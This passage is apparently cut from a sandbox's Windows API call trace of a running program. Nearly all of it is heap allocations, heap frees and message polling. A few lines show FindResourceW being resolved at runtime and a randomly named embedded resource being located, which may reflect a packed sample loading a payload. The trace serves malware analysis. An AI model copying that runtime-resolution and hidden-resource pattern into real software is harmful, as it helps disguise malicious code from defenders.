wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.604] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.604] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.604] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.604] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.604] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0122.604] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0122.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x14bda90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindResourceW", lpUsedDefaultChar=0x0) returned 14 [0122.605] GetProcAddress (hModule=0x74650000, lpProcName="FindResourceW") returned 0x74672a40 [0122.607] FindResourceW (hModule=0x0, lpName="fmweecwytels", lpType=0xa) returned 0xfe76a8 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaa8 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9d0 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb98 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa10 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb08 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc28 [0122.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc28 | out: hHeap=0x12c0000) returned 1 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda60 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbc8 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbc8 | out: hHeap=0x12c0000) returned 1 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb20 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb98 [0122.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbe0 [0122.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef980 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbe0 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0122.610] FreeLibrary (hLibModule=0x74650000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0122.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9e8 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc10 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdca0 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3538 | out: hHeap=0x12c0000) returned 1 [0122.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0122.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb38 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb38 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9d0 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb08 | out: hHeap=0x12c0000) returned 1 [0122.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda60 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb20 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaa8 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0122.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0122.613] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.614] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0122.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0122.614] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa50 [0122.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300d20 [0122.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0122.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0122.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0122.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0122.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.745] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0122.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0122.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0122.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0122.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0122.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.745] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.745] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0122.746] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0122.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0122.746] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.746] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0122.746] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.746] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.747] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.747] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0122.747] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.747] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0122.748] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0122.748] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8e0 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0122.748] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0122.748] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0122.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0122.749] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0122.749] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0122.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0122.749] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0122.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0122.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0122.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0122.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0122.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef980 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0122.751] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0122.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9c0 [0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9e0 [0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda18 [0122.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda18 | out: hHeap=0x12c0000) returned 1 [0122.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 